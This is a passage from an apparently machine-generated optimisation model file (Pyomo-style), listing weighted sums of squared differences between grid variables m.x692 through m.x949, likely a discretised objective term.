**2 + (1.3*m.x693 - 1.3*m.x692)**2) + 2.18838296475748*((8.11690209768664*m.x720 -
8.11690209768664*m.x693)**2 + (1.3*m.x694 - 1.3*m.x693)**2) + 2.18838296475748*((8.11690209768664
*m.x721 - 8.11690209768664*m.x694)**2 + (1.3*m.x695 - 1.3*m.x694)**2) + 2.18838296475748*((
8.11690209768664*m.x722 - 8.11690209768664*m.x695)**2 + (1.3*m.x696 - 1.3*m.x695)**2) +
2.18838296475748*((8.11690209768664*m.x723 - 8.11690209768664*m.x696)**2 + (1.3*m.x697 - 1.3*
m.x696)**2) + 2.18838296475748*((8.11690209768664*m.x724 - 8.11690209768664*m.x697)**2 + (1.3*
m.x698 - 1.3*m.x697)**2) + 2.18838296475748*((8.11690209768664*m.x725 - 8.11690209768664*m.x698)
**2 + (1.3*m.x699 - 1.3*m.x698)**2) + 2.18838296475748*((8.11690209768664*m.x726 -
8.11690209768664*m.x699)**2 + (1.3*m.x700 - 1.3*m.x699)**2) + 2.18838296475748*((8.11690209768664
*m.x727 - 8.11690209768664*m.x700)**2 + (1.3*m.x701 - 1.3*m.x700)**2) + 2.18838296475748*((
8.11690209768664*m.x728 - 8.11690209768664*m.x701)**2 + (1.3*m.x702 - 1.3*m.x701)**2) +
2.19575172710689*((8.11690209768664*m.x730 - 8.11690209768664*m.x703)**2 + (1.3*m.x704 - 1.3*
m.x703)**2) + 2.19575172710689*((8.11690209768664*m.x731 - 8.11690209768664*m.x704)**2 + (1.3*
m.x705 - 1.3*m.x704)**2) + 2.19575172710689*((8.11690209768664*m.x732 - 8.11690209768664*m.x705)
**2 + (1.3*m.x706 - 1.3*m.x705)**2) + 2.19575172710689*((8.11690209768664*m.x733 -
8.11690209768664*m.x706)**2 + (1.3*m.x707 - 1.3*m.x706)**2) + 2.19575172710689*((8.11690209768664
*m.x734 - 8.11690209768664*m.x707)**2 + (1.3*m.x708 - 1.3*m.x707)**2) + 2.19575172710689*((
8.11690209768664*m.x735 - 8.11690209768664*m.x708)**2 + (1.3*m.x709 - 1.3*m.x708)**2) +
2.19575172710689*((8.11690209768664*m.x736 - 8.11690209768664*m.x709)**2 + (1.3*m.x710 - 1.3*
m.x709)**2) + 2.19575172710689*((8.11690209768664*m.x737 - 8.11690209768664*m.x710)**2 + (1.3*
m.x711 - 1.3*m.x710)**2) + 2.19575172710689*((8.11690209768664*m.x738 - 8.11690209768664*m.x711)
**2 + (1.3*m.x712 - 1.3*m.x711)**2) + 2.19575172710689*((8.11690209768664*m.x739 -
8.11690209768664*m.x712)**2 + (1.3*m.x713 - 1.3*m.x712)**2) + 2.19575172710689*((8.11690209768664
*m.x740 - 8.11690209768664*m.x713)**2 + (1.3*m.x714 - 1.3*m.x713)**2) + 2.19575172710689*((
8.11690209768664*m.x741 - 8.11690209768664*m.x714)**2 + (1.3*m.x715 - 1.3*m.x714)**2) +
2.19575172710689*((8.11690209768664*m.x742 - 8.11690209768664*m.x715)**2 + (1.3*m.x716 - 1.3*
m.x715)**2) + 2.19575172710689*((8.11690209768664*m.x743 - 8.11690209768664*m.x716)**2 + (1.3*
m.x717 - 1.3*m.x716)**2) + 2.19575172710689*((8.11690209768664*m.x744 - 8.11690209768664*m.x717)
**2 + (1.3*m.x718 - 1.3*m.x717)**2) + 2.19575172710689*((8.11690209768664*m.x745 -
8.11690209768664*m.x718)**2 + (1.3*m.x719 - 1.3*m.x718)**2) + 2.19575172710689*((8.11690209768664
*m.x746 - 8.11690209768664*m.x719)**2 + (1.3*m.x720 - 1.3*m.x719)**2) + 2.19575172710689*((
8.11690209768664*m.x747 - 8.11690209768664*m.x720)**2 + (1.3*m.x721 - 1.3*m.x720)**2) +
2.19575172710689*((8.11690209768664*m.x748 - 8.11690209768664*m.x721)**2 + (1.3*m.x722 - 1.3*
m.x721)**2) + 2.19575172710689*((8.11690209768664*m.x749 - 8.11690209768664*m.x722)**2 + (1.3*
m.x723 - 1.3*m.x722)**2) + 2.19575172710689*((8.11690209768664*m.x750 - 8.11690209768664*m.x723)
**2 + (1.3*m.x724 - 1.3*m.x723)**2) + 2.19575172710689*((8.11690209768664*m.x751 -
8.11690209768664*m.x724)**2 + (1.3*m.x725 - 1.3*m.x724)**2) + 2.19575172710689*((8.11690209768664
*m.x752 - 8.11690209768664*m.x725)**2 + (1.3*m.x726 - 1.3*m.x725)**2) + 2.19575172710689*((
8.11690209768664*m.x753 - 8.11690209768664*m.x726)**2 + (1.3*m.x727 - 1.3*m.x726)**2) +
2.19575172710689*((8.11690209768664*m.x754 - 8.11690209768664*m.x727)**2 + (1.3*m.x728 - 1.3*
m.x727)**2) + 2.19575172710689*((8.11690209768664*m.x755 - 8.11690209768664*m.x728)**2 + (1.3*
m.x729 - 1.3*m.x728)**2) + 2.21413534622276*((8.11690209768664*m.x757 - 8.11690209768664*m.x730)
**2 + (1.3*m.x731 - 1.3*m.x730)**2) + 2.21413534622276*((8.11690209768664*m.x758 -
8.11690209768664*m.x731)**2 + (1.3*m.x732 - 1.3*m.x731)**2) + 2.21413534622276*((8.11690209768664
*m.x759 - 8.11690209768664*m.x732)**2 + (1.3*m.x733 - 1.3*m.x732)**2) + 2.21413534622276*((
8.11690209768664*m.x760 - 8.11690209768664*m.x733)**2 + (1.3*m.x734 - 1.3*m.x733)**2) +
2.21413534622276*((8.11690209768664*m.x761 - 8.11690209768664*m.x734)**2 + (1.3*m.x735 - 1.3*
m.x734)**2) + 2.21413534622276*((8.11690209768664*m.x762 - 8.11690209768664*m.x735)**2 + (1.3*
m.x736 - 1.3*m.x735)**2) + 2.21413534622276*((8.11690209768664*m.x763 - 8.11690209768664*m.x736)
**2 + (1.3*m.x737 - 1.3*m.x736)**2) + 2.21413534622276*((8.11690209768664*m.x764 -
8.11690209768664*m.x737)**2 + (1.3*m.x738 - 1.3*m.x737)**2) + 2.21413534622276*((8.11690209768664
*m.x765 - 8.11690209768664*m.x738)**2 + (1.3*m.x739 - 1.3*m.x738)**2) + 2.21413534622276*((
8.11690209768664*m.x766 - 8.11690209768664*m.x739)**2 + (1.3*m.x740 - 1.3*m.x739)**2) +
2.21413534622276*((8.11690209768664*m.x767 - 8.11690209768664*m.x740)**2 + (1.3*m.x741 - 1.3*
m.x740)**2) + 2.21413534622276*((8.11690209768664*m.x768 - 8.11690209768664*m.x741)**2 + (1.3*
m.x742 - 1.3*m.x741)**2) + 2.21413534622276*((8.11690209768664*m.x769 - 8.11690209768664*m.x742)
**2 + (1.3*m.x743 - 1.3*m.x742)**2) + 2.21413534622276*((8.11690209768664*m.x770 -
8.11690209768664*m.x743)**2 + (1.3*m.x744 - 1.3*m.x743)**2) + 2.21413534622276*((8.11690209768664
*m.x771 - 8.11690209768664*m.x744)**2 + (1.3*m.x745 - 1.3*m.x744)**2) + 2.21413534622276*((
8.11690209768664*m.x772 - 8.11690209768664*m.x745)**2 + (1.3*m.x746 - 1.3*m.x745)**2) +
2.21413534622276*((8.11690209768664*m.x773 - 8.11690209768664*m.x746)**2 + (1.3*m.x747 - 1.3*
m.x746)**2) + 2.21413534622276*((8.11690209768664*m.x774 - 8.11690209768664*m.x747)**2 + (1.3*
m.x748 - 1.3*m.x747)**2) + 2.21413534622276*((8.11690209768664*m.x775 - 8.11690209768664*m.x748)
**2 + (1.3*m.x749 - 1.3*m.x748)**2) + 2.21413534622276*((8.11690209768664*m.x776 -
8.11690209768664*m.x749)**2 + (1.3*m.x750 - 1.3*m.x749)**2) + 2.21413534622276*((8.11690209768664
*m.x777 - 8.11690209768664*m.x750)**2 + (1.3*m.x751 - 1.3*m.x750)**2) + 2.21413534622276*((
8.11690209768664*m.x778 - 8.11690209768664*m.x751)**2 + (1.3*m.x752 - 1.3*m.x751)**2) +
2.21413534622276*((8.11690209768664*m.x779 - 8.11690209768664*m.x752)**2 + (1.3*m.x753 - 1.3*
m.x752)**2) + 2.21413534622276*((8.11690209768664*m.x780 - 8.11690209768664*m.x753)**2 + (1.3*
m.x754 - 1.3*m.x753)**2) + 2.21413534622276*((8.11690209768664*m.x781 - 8.11690209768664*m.x754)
**2 + (1.3*m.x755 - 1.3*m.x754)**2) + 2.21413534622276*((8.11690209768664*m.x782 -
8.11690209768664*m.x755)**2 + (1.3*m.x756 - 1.3*m.x755)**2) + 2.24343484490943*((8.11690209768664
*m.x784 - 8.11690209768664*m.x757)**2 + (1.3*m.x758 - 1.3*m.x757)**2) + 2.24343484490943*((
8.11690209768664*m.x785 - 8.11690209768664*m.x758)**2 + (1.3*m.x759 - 1.3*m.x758)**2) +
2.24343484490943*((8.11690209768664*m.x786 - 8.11690209768664*m.x759)**2 + (1.3*m.x760 - 1.3*
m.x759)**2) + 2.24343484490943*((8.11690209768664*m.x787 - 8.11690209768664*m.x760)**2 + (1.3*
m.x761 - 1.3*m.x760)**2) + 2.24343484490943*((8.11690209768664*m.x788 - 8.11690209768664*m.x761)
**2 + (1.3*m.x762 - 1.3*m.x761)**2) + 2.24343484490943*((8.11690209768664*m.x789 -
8.11690209768664*m.x762)**2 + (1.3*m.x763 - 1.3*m.x762)**2) + 2.24343484490943*((8.11690209768664
*m.x790 - 8.11690209768664*m.x763)**2 + (1.3*m.x764 - 1.3*m.x763)**2) + 2.24343484490943*((
8.11690209768664*m.x791 - 8.11690209768664*m.x764)**2 + (1.3*m.x765 - 1.3*m.x764)**2) +
2.24343484490943*((8.11690209768664*m.x792 - 8.11690209768664*m.x765)**2 + (1.3*m.x766 - 1.3*
m.x765)**2) + 2.24343484490943*((8.11690209768664*m.x793 - 8.11690209768664*m.x766)**2 + (1.3*
m.x767 - 1.3*m.x766)**2) + 2.24343484490943*((8.11690209768664*m.x794 - 8.11690209768664*m.x767)
**2 + (1.3*m.x768 - 1.3*m.x767)**2) + 2.24343484490943*((8.11690209768664*m.x795 -
8.11690209768664*m.x768)**2 + (1.3*m.x769 - 1.3*m.x768)**2) + 2.24343484490943*((8.11690209768664
*m.x796 - 8.11690209768664*m.x769)**2 + (1.3*m.x770 - 1.3*m.x769)**2) + 2.24343484490943*((
8.11690209768664*m.x797 - 8.11690209768664*m.x770)**2 + (1.3*m.x771 - 1.3*m.x770)**2) +
2.24343484490943*((8.11690209768664*m.x798 - 8.11690209768664*m.x771)**2 + (1.3*m.x772 - 1.3*
m.x771)**2) + 2.24343484490943*((8.11690209768664*m.x799 - 8.11690209768664*m.x772)**2 + (1.3*
m.x773 - 1.3*m.x772)**2) + 2.24343484490943*((8.11690209768664*m.x800 - 8.11690209768664*m.x773)
**2 + (1.3*m.x774 - 1.3*m.x773)**2) + 2.24343484490943*((8.11690209768664*m.x801 -
8.11690209768664*m.x774)**2 + (1.3*m.x775 - 1.3*m.x774)**2) + 2.24343484490943*((8.11690209768664
*m.x802 - 8.11690209768664*m.x775)**2 + (1.3*m.x776 - 1.3*m.x775)**2) + 2.24343484490943*((
8.11690209768664*m.x803 - 8.11690209768664*m.x776)**2 + (1.3*m.x777 - 1.3*m.x776)**2) +
2.24343484490943*((8.11690209768664*m.x804 - 8.11690209768664*m.x777)**2 + (1.3*m.x778 - 1.3*
m.x777)**2) + 2.24343484490943*((8.11690209768664*m.x805 - 8.11690209768664*m.x778)**2 + (1.3*
m.x779 - 1.3*m.x778)**2) + 2.24343484490943*((8.11690209768664*m.x806 - 8.11690209768664*m.x779)
**2 + (1.3*m.x780 - 1.3*m.x779)**2) + 2.24343484490943*((8.11690209768664*m.x807 -
8.11690209768664*m.x780)**2 + (1.3*m.x781 - 1.3*m.x780)**2) + 2.24343484490943*((8.11690209768664
*m.x808 - 8.11690209768664*m.x781)**2 + (1.3*m.x782 - 1.3*m.x781)**2) + 2.24343484490943*((
8.11690209768664*m.x809 - 8.11690209768664*m.x782)**2 + (1.3*m.x783 - 1.3*m.x782)**2) +
2.28348260596749*((8.11690209768664*m.x811 - 8.11690209768664*m.x784)**2 + (1.3*m.x785 - 1.3*
m.x784)**2) + 2.28348260596749*((8.11690209768664*m.x812 - 8.11690209768664*m.x785)**2 + (1.3*
m.x786 - 1.3*m.x785)**2) + 2.28348260596749*((8.11690209768664*m.x813 - 8.11690209768664*m.x786)
**2 + (1.3*m.x787 - 1.3*m.x786)**2) + 2.28348260596749*((8.11690209768664*m.x814 -
8.11690209768664*m.x787)**2 + (1.3*m.x788 - 1.3*m.x787)**2) + 2.28348260596749*((8.11690209768664
*m.x815 - 8.11690209768664*m.x788)**2 + (1.3*m.x789 - 1.3*m.x788)**2) + 2.28348260596749*((
8.11690209768664*m.x816 - 8.11690209768664*m.x789)**2 + (1.3*m.x790 - 1.3*m.x789)**2) +
2.28348260596749*((8.11690209768664*m.x817 - 8.11690209768664*m.x790)**2 + (1.3*m.x791 - 1.3*
m.x790)**2) + 2.28348260596749*((8.11690209768664*m.x818 - 8.11690209768664*m.x791)**2 + (1.3*
m.x792 - 1.3*m.x791)**2) + 2.28348260596749*((8.11690209768664*m.x819 - 8.11690209768664*m.x792)
**2 + (1.3*m.x793 - 1.3*m.x792)**2) + 2.28348260596749*((8.11690209768664*m.x820 -
8.11690209768664*m.x793)**2 + (1.3*m.x794 - 1.3*m.x793)**2) + 2.28348260596749*((8.11690209768664
*m.x821 - 8.11690209768664*m.x794)**2 + (1.3*m.x795 - 1.3*m.x794)**2) + 2.28348260596749*((
8.11690209768664*m.x822 - 8.11690209768664*m.x795)**2 + (1.3*m.x796 - 1.3*m.x795)**2) +
2.28348260596749*((8.11690209768664*m.x823 - 8.11690209768664*m.x796)**2 + (1.3*m.x797 - 1.3*
m.x796)**2) + 2.28348260596749*((8.11690209768664*m.x824 - 8.11690209768664*m.x797)**2 + (1.3*
m.x798 - 1.3*m.x797)**2) + 2.28348260596749*((8.11690209768664*m.x825 - 8.11690209768664*m.x798)
**2 + (1.3*m.x799 - 1.3*m.x798)**2) + 2.28348260596749*((8.11690209768664*m.x826 -
8.11690209768664*m.x799)**2 + (1.3*m.x800 - 1.3*m.x799)**2) + 2.28348260596749*((8.11690209768664
*m.x827 - 8.11690209768664*m.x800)**2 + (1.3*m.x801 - 1.3*m.x800)**2) + 2.28348260596749*((
8.11690209768664*m.x828 - 8.11690209768664*m.x801)**2 + (1.3*m.x802 - 1.3*m.x801)**2) +
2.28348260596749*((8.11690209768664*m.x829 - 8.11690209768664*m.x802)**2 + (1.3*m.x803 - 1.3*
m.x802)**2) + 2.28348260596749*((8.11690209768664*m.x830 - 8.11690209768664*m.x803)**2 + (1.3*
m.x804 - 1.3*m.x803)**2) + 2.28348260596749*((8.11690209768664*m.x831 - 8.11690209768664*m.x804)
**2 + (1.3*m.x805 - 1.3*m.x804)**2) + 2.28348260596749*((8.11690209768664*m.x832 -
8.11690209768664*m.x805)**2 + (1.3*m.x806 - 1.3*m.x805)**2) + 2.28348260596749*((8.11690209768664
*m.x833 - 8.11690209768664*m.x806)**2 + (1.3*m.x807 - 1.3*m.x806)**2) + 2.28348260596749*((
8.11690209768664*m.x834 - 8.11690209768664*m.x807)**2 + (1.3*m.x808 - 1.3*m.x807)**2) +
2.28348260596749*((8.11690209768664*m.x835 - 8.11690209768664*m.x808)**2 + (1.3*m.x809 - 1.3*
m.x808)**2) + 2.28348260596749*((8.11690209768664*m.x836 - 8.11690209768664*m.x809)**2 + (1.3*
m.x810 - 1.3*m.x809)**2) + 2.33403023495273*((8.11690209768664*m.x838 - 8.11690209768664*m.x811)
**2 + (1.3*m.x812 - 1.3*m.x811)**2) + 2.33403023495273*((8.11690209768664*m.x839 -
8.11690209768664*m.x812)**2 + (1.3*m.x813 - 1.3*m.x812)**2) + 2.33403023495273*((8.11690209768664
*m.x840 - 8.11690209768664*m.x813)**2 + (1.3*m.x814 - 1.3*m.x813)**2) + 2.33403023495273*((
8.11690209768664*m.x841 - 8.11690209768664*m.x814)**2 + (1.3*m.x815 - 1.3*m.x814)**2) +
2.33403023495273*((8.11690209768664*m.x842 - 8.11690209768664*m.x815)**2 + (1.3*m.x816 - 1.3*
m.x815)**2) + 2.33403023495273*((8.11690209768664*m.x843 - 8.11690209768664*m.x816)**2 + (1.3*
m.x817 - 1.3*m.x816)**2) + 2.33403023495273*((8.11690209768664*m.x844 - 8.11690209768664*m.x817)
**2 + (1.3*m.x818 - 1.3*m.x817)**2) + 2.33403023495273*((8.11690209768664*m.x845 -
8.11690209768664*m.x818)**2 + (1.3*m.x819 - 1.3*m.x818)**2) + 2.33403023495273*((8.11690209768664
*m.x846 - 8.11690209768664*m.x819)**2 + (1.3*m.x820 - 1.3*m.x819)**2) + 2.33403023495273*((
8.11690209768664*m.x847 - 8.11690209768664*m.x820)**2 + (1.3*m.x821 - 1.3*m.x820)**2) +
2.33403023495273*((8.11690209768664*m.x848 - 8.11690209768664*m.x821)**2 + (1.3*m.x822 - 1.3*
m.x821)**2) + 2.33403023495273*((8.11690209768664*m.x849 - 8.11690209768664*m.x822)**2 + (1.3*
m.x823 - 1.3*m.x822)**2) + 2.33403023495273*((8.11690209768664*m.x850 - 8.11690209768664*m.x823)
**2 + (1.3*m.x824 - 1.3*m.x823)**2) + 2.33403023495273*((8.11690209768664*m.x851 -
8.11690209768664*m.x824)**2 + (1.3*m.x825 - 1.3*m.x824)**2) + 2.33403023495273*((8.11690209768664
*m.x852 - 8.11690209768664*m.x825)**2 + (1.3*m.x826 - 1.3*m.x825)**2) + 2.33403023495273*((
8.11690209768664*m.x853 - 8.11690209768664*m.x826)**2 + (1.3*m.x827 - 1.3*m.x826)**2) +
2.33403023495273*((8.11690209768664*m.x854 - 8.11690209768664*m.x827)**2 + (1.3*m.x828 - 1.3*
m.x827)**2) + 2.33403023495273*((8.11690209768664*m.x855 - 8.11690209768664*m.x828)**2 + (1.3*
m.x829 - 1.3*m.x828)**2) + 2.33403023495273*((8.11690209768664*m.x856 - 8.11690209768664*m.x829)
**2 + (1.3*m.x830 - 1.3*m.x829)**2) + 2.33403023495273*((8.11690209768664*m.x857 -
8.11690209768664*m.x830)**2 + (1.3*m.x831 - 1.3*m.x830)**2) + 2.33403023495273*((8.11690209768664
*m.x858 - 8.11690209768664*m.x831)**2 + (1.3*m.x832 - 1.3*m.x831)**2) + 2.33403023495273*((
8.11690209768664*m.x859 - 8.11690209768664*m.x832)**2 + (1.3*m.x833 - 1.3*m.x832)**2) +
2.33403023495273*((8.11690209768664*m.x860 - 8.11690209768664*m.x833)**2 + (1.3*m.x834 - 1.3*
m.x833)**2) + 2.33403023495273*((8.11690209768664*m.x861 - 8.11690209768664*m.x834)**2 + (1.3*
m.x835 - 1.3*m.x834)**2) + 2.33403023495273*((8.11690209768664*m.x862 - 8.11690209768664*m.x835)
**2 + (1.3*m.x836 - 1.3*m.x835)**2) + 2.33403023495273*((8.11690209768664*m.x863 -
8.11690209768664*m.x836)**2 + (1.3*m.x837 - 1.3*m.x836)**2) + 2.39473303225368*((8.11690209768664
*m.x865 - 8.11690209768664*m.x838)**2 + (1.3*m.x839 - 1.3*m.x838)**2) + 2.39473303225368*((
8.11690209768664*m.x866 - 8.11690209768664*m.x839)**2 + (1.3*m.x840 - 1.3*m.x839)**2) +
2.39473303225368*((8.11690209768664*m.x867 - 8.11690209768664*m.x840)**2 + (1.3*m.x841 - 1.3*
m.x840)**2) + 2.39473303225368*((8.11690209768664*m.x868 - 8.11690209768664*m.x841)**2 + (1.3*
m.x842 - 1.3*m.x841)**2) + 2.39473303225368*((8.11690209768664*m.x869 - 8.11690209768664*m.x842)
**2 + (1.3*m.x843 - 1.3*m.x842)**2) + 2.39473303225368*((8.11690209768664*m.x870 -
8.11690209768664*m.x843)**2 + (1.3*m.x844 - 1.3*m.x843)**2) + 2.39473303225368*((8.11690209768664
*m.x871 - 8.11690209768664*m.x844)**2 + (1.3*m.x845 - 1.3*m.x844)**2) + 2.39473303225368*((
8.11690209768664*m.x872 - 8.11690209768664*m.x845)**2 + (1.3*m.x846 - 1.3*m.x845)**2) +
2.39473303225368*((8.11690209768664*m.x873 - 8.11690209768664*m.x846)**2 + (1.3*m.x847 - 1.3*
m.x846)**2) + 2.39473303225368*((8.11690209768664*m.x874 - 8.11690209768664*m.x847)**2 + (1.3*
m.x848 - 1.3*m.x847)**2) + 2.39473303225368*((8.11690209768664*m.x875 - 8.11690209768664*m.x848)
**2 + (1.3*m.x849 - 1.3*m.x848)**2) + 2.39473303225368*((8.11690209768664*m.x876 -
8.11690209768664*m.x849)**2 + (1.3*m.x850 - 1.3*m.x849)**2) + 2.39473303225368*((8.11690209768664
*m.x877 - 8.11690209768664*m.x850)**2 + (1.3*m.x851 - 1.3*m.x850)**2) + 2.39473303225368*((
8.11690209768664*m.x878 - 8.11690209768664*m.x851)**2 + (1.3*m.x852 - 1.3*m.x851)**2) +
2.39473303225368*((8.11690209768664*m.x879 - 8.11690209768664*m.x852)**2 + (1.3*m.x853 - 1.3*
m.x852)**2) + 2.39473303225368*((8.11690209768664*m.x880 - 8.11690209768664*m.x853)**2 + (1.3*
m.x854 - 1.3*m.x853)**2) + 2.39473303225368*((8.11690209768664*m.x881 - 8.11690209768664*m.x854)
**2 + (1.3*m.x855 - 1.3*m.x854)**2) + 2.39473303225368*((8.11690209768664*m.x882 -
8.11690209768664*m.x855)**2 + (1.3*m.x856 - 1.3*m.x855)**2) + 2.39473303225368*((8.11690209768664
*m.x883 - 8.11690209768664*m.x856)**2 + (1.3*m.x857 - 1.3*m.x856)**2) + 2.39473303225368*((
8.11690209768664*m.x884 - 8.11690209768664*m.x857)**2 + (1.3*m.x858 - 1.3*m.x857)**2) +
2.39473303225368*((8.11690209768664*m.x885 - 8.11690209768664*m.x858)**2 + (1.3*m.x859 - 1.3*
m.x858)**2) + 2.39473303225368*((8.11690209768664*m.x886 - 8.11690209768664*m.x859)**2 + (1.3*
m.x860 - 1.3*m.x859)**2) + 2.39473303225368*((8.11690209768664*m.x887 - 8.11690209768664*m.x860)
**2 + (1.3*m.x861 - 1.3*m.x860)**2) + 2.39473303225368*((8.11690209768664*m.x888 -
8.11690209768664*m.x861)**2 + (1.3*m.x862 - 1.3*m.x861)**2) + 2.39473303225368*((8.11690209768664
*m.x889 - 8.11690209768664*m.x862)**2 + (1.3*m.x863 - 1.3*m.x862)**2) + 2.39473303225368*((
8.11690209768664*m.x890 - 8.11690209768664*m.x863)**2 + (1.3*m.x864 - 1.3*m.x863)**2) +
2.46513215473303*((8.11690209768664*m.x892 - 8.11690209768664*m.x865)**2 + (1.3*m.x866 - 1.3*
m.x865)**2) + 2.46513215473303*((8.11690209768664*m.x893 - 8.11690209768664*m.x866)**2 + (1.3*
m.x867 - 1.3*m.x866)**2) + 2.46513215473303*((8.11690209768664*m.x894 - 8.11690209768664*m.x867)
**2 + (1.3*m.x868 - 1.3*m.x867)**2) + 2.46513215473303*((8.11690209768664*m.x895 -
8.11690209768664*m.x868)**2 + (1.3*m.x869 - 1.3*m.x868)**2) + 2.46513215473303*((8.11690209768664
*m.x896 - 8.11690209768664*m.x869)**2 + (1.3*m.x870 - 1.3*m.x869)**2) + 2.46513215473303*((
8.11690209768664*m.x897 - 8.11690209768664*m.x870)**2 + (1.3*m.x871 - 1.3*m.x870)**2) +
2.46513215473303*((8.11690209768664*m.x898 - 8.11690209768664*m.x871)**2 + (1.3*m.x872 - 1.3*
m.x871)**2) + 2.46513215473303*((8.11690209768664*m.x899 - 8.11690209768664*m.x872)**2 + (1.3*
m.x873 - 1.3*m.x872)**2) + 2.46513215473303*((8.11690209768664*m.x900 - 8.11690209768664*m.x873)
**2 + (1.3*m.x874 - 1.3*m.x873)**2) + 2.46513215473303*((8.11690209768664*m.x901 -
8.11690209768664*m.x874)**2 + (1.3*m.x875 - 1.3*m.x874)**2) + 2.46513215473303*((8.11690209768664
*m.x902 - 8.11690209768664*m.x875)**2 + (1.3*m.x876 - 1.3*m.x875)**2) + 2.46513215473303*((
8.11690209768664*m.x903 - 8.11690209768664*m.x876)**2 + (1.3*m.x877 - 1.3*m.x876)**2) +
2.46513215473303*((8.11690209768664*m.x904 - 8.11690209768664*m.x877)**2 + (1.3*m.x878 - 1.3*
m.x877)**2) + 2.46513215473303*((8.11690209768664*m.x905 - 8.11690209768664*m.x878)**2 + (1.3*
m.x879 - 1.3*m.x878)**2) + 2.46513215473303*((8.11690209768664*m.x906 - 8.11690209768664*m.x879)
**2 + (1.3*m.x880 - 1.3*m.x879)**2) + 2.46513215473303*((8.11690209768664*m.x907 -
8.11690209768664*m.x880)**2 + (1.3*m.x881 - 1.3*m.x880)**2) + 2.46513215473303*((8.11690209768664
*m.x908 - 8.11690209768664*m.x881)**2 + (1.3*m.x882 - 1.3*m.x881)**2) + 2.46513215473303*((
8.11690209768664*m.x909 - 8.11690209768664*m.x882)**2 + (1.3*m.x883 - 1.3*m.x882)**2) +
2.46513215473303*((8.11690209768664*m.x910 - 8.11690209768664*m.x883)**2 + (1.3*m.x884 - 1.3*
m.x883)**2) + 2.46513215473303*((8.11690209768664*m.x911 - 8.11690209768664*m.x884)**2 + (1.3*
m.x885 - 1.3*m.x884)**2) + 2.46513215473303*((8.11690209768664*m.x912 - 8.11690209768664*m.x885)
**2 + (1.3*m.x886 - 1.3*m.x885)**2) + 2.46513215473303*((8.11690209768664*m.x913 -
8.11690209768664*m.x886)**2 + (1.3*m.x887 - 1.3*m.x886)**2) + 2.46513215473303*((8.11690209768664
*m.x914 - 8.11690209768664*m.x887)**2 + (1.3*m.x888 - 1.3*m.x887)**2) + 2.46513215473303*((
8.11690209768664*m.x915 - 8.11690209768664*m.x888)**2 + (1.3*m.x889 - 1.3*m.x888)**2) +
2.46513215473303*((8.11690209768664*m.x916 - 8.11690209768664*m.x889)**2 + (1.3*m.x890 - 1.3*
m.x889)**2) + 2.46513215473303*((8.11690209768664*m.x917 - 8.11690209768664*m.x890)**2 + (1.3*
m.x891 - 1.3*m.x890)**2) + 2.54463580631522*((8.11690209768664*m.x919 - 8.11690209768664*m.x892)
**2 + (1.3*m.x893 - 1.3*m.x892)**2) + 2.54463580631522*((8.11690209768664*m.x920 -
8.11690209768664*m.x893)**2 + (1.3*m.x894 - 1.3*m.x893)**2) + 2.54463580631522*((8.11690209768664
*m.x921 - 8.11690209768664*m.x894)**2 + (1.3*m.x895 - 1.3*m.x894)**2) + 2.54463580631522*((
8.11690209768664*m.x922 - 8.11690209768664*m.x895)**2 + (1.3*m.x896 - 1.3*m.x895)**2) +
2.54463580631522*((8.11690209768664*m.x923 - 8.11690209768664*m.x896)**2 + (1.3*m.x897 - 1.3*
m.x896)**2) + 2.54463580631522*((8.11690209768664*m.x924 - 8.11690209768664*m.x897)**2 + (1.3*
m.x898 - 1.3*m.x897)**2) + 2.54463580631522*((8.11690209768664*m.x925 - 8.11690209768664*m.x898)
**2 + (1.3*m.x899 - 1.3*m.x898)**2) + 2.54463580631522*((8.11690209768664*m.x926 -
8.11690209768664*m.x899)**2 + (1.3*m.x900 - 1.3*m.x899)**2) + 2.54463580631522*((8.11690209768664
*m.x927 - 8.11690209768664*m.x900)**2 + (1.3*m.x901 - 1.3*m.x900)**2) + 2.54463580631522*((
8.11690209768664*m.x928 - 8.11690209768664*m.x901)**2 + (1.3*m.x902 - 1.3*m.x901)**2) +
2.54463580631522*((8.11690209768664*m.x929 - 8.11690209768664*m.x902)**2 + (1.3*m.x903 - 1.3*
m.x902)**2) + 2.54463580631522*((8.11690209768664*m.x930 - 8.11690209768664*m.x903)**2 + (1.3*
m.x904 - 1.3*m.x903)**2) + 2.54463580631522*((8.11690209768664*m.x931 - 8.11690209768664*m.x904)
**2 + (1.3*m.x905 - 1.3*m.x904)**2) + 2.54463580631522*((8.11690209768664*m.x932 -
8.11690209768664*m.x905)**2 + (1.3*m.x906 - 1.3*m.x905)**2) + 2.54463580631522*((8.11690209768664
*m.x933 - 8.11690209768664*m.x906)**2 + (1.3*m.x907 - 1.3*m.x906)**2) + 2.54463580631522*((
8.11690209768664*m.x934 - 8.11690209768664*m.x907)**2 + (1.3*m.x908 - 1.3*m.x907)**2) +
2.54463580631522*((8.11690209768664*m.x935 - 8.11690209768664*m.x908)**2 + (1.3*m.x909 - 1.3*
m.x908)**2) + 2.54463580631522*((8.11690209768664*m.x936 - 8.11690209768664*m.x909)**2 + (1.3*
m.x910 - 1.3*m.x909)**2) + 2.54463580631522*((8.11690209768664*m.x937 - 8.11690209768664*m.x910)
**2 + (1.3*m.x911 - 1.3*m.x910)**2) + 2.54463580631522*((8.11690209768664*m.x938 -
8.11690209768664*m.x911)**2 + (1.3*m.x912 - 1.3*m.x911)**2) + 2.54463580631522*((8.11690209768664
*m.x939 - 8.11690209768664*m.x912)**2 + (1.3*m.x913 - 1.3*m.x912)**2) + 2.54463580631522*((
8.11690209768664*m.x940 - 8.11690209768664*m.x913)**2 + (1.3*m.x914 - 1.3*m.x913)**2) +
2.54463580631522*((8.11690209768664*m.x941 - 8.11690209768664*m.x914)**2 + (1.3*m.x915 - 1.3*
m.x914)**2) + 2.54463580631522*((8.11690209768664*m.x942 - 8.11690209768664*m.x915)**2 + (1.3*
m.x916 - 1.3*m.x915)**2) + 2.54463580631522*((8.11690209768664*m.x943 - 8.11690209768664*m.x916)
**2 + (1.3*m.x917 - 1.3*m.x916)**2) + 2.54463580631522*((8.11690209768664*m.x944 -
8.11690209768664*m.x917)**2 + (1.3*m.x918 - 1.3*m.x917)**2) + 2.63250101495027*((8.11690209768664
*m.x946 - 8.11690209768664*m.x919)**2 + (1.3*m.x920 - 1.3*m.x919)**2) + 2.63250101495027*((
8.11690209768664*m.x947 - 8.11690209768664*m.x920)**2 + (1.3*m.x921 - 1.3*m.x920)**2) +
2.63250101495027*((8.11690209768664*m.x948 - 8.11690209768664*m.x921)**2 + (1.3*m.x922 - 1.3*
m.x921)**2) + 2.63250101495027*((8.11690209768664*m.x949 - 8.11690209768664*m.x922)**2 + (1.3*
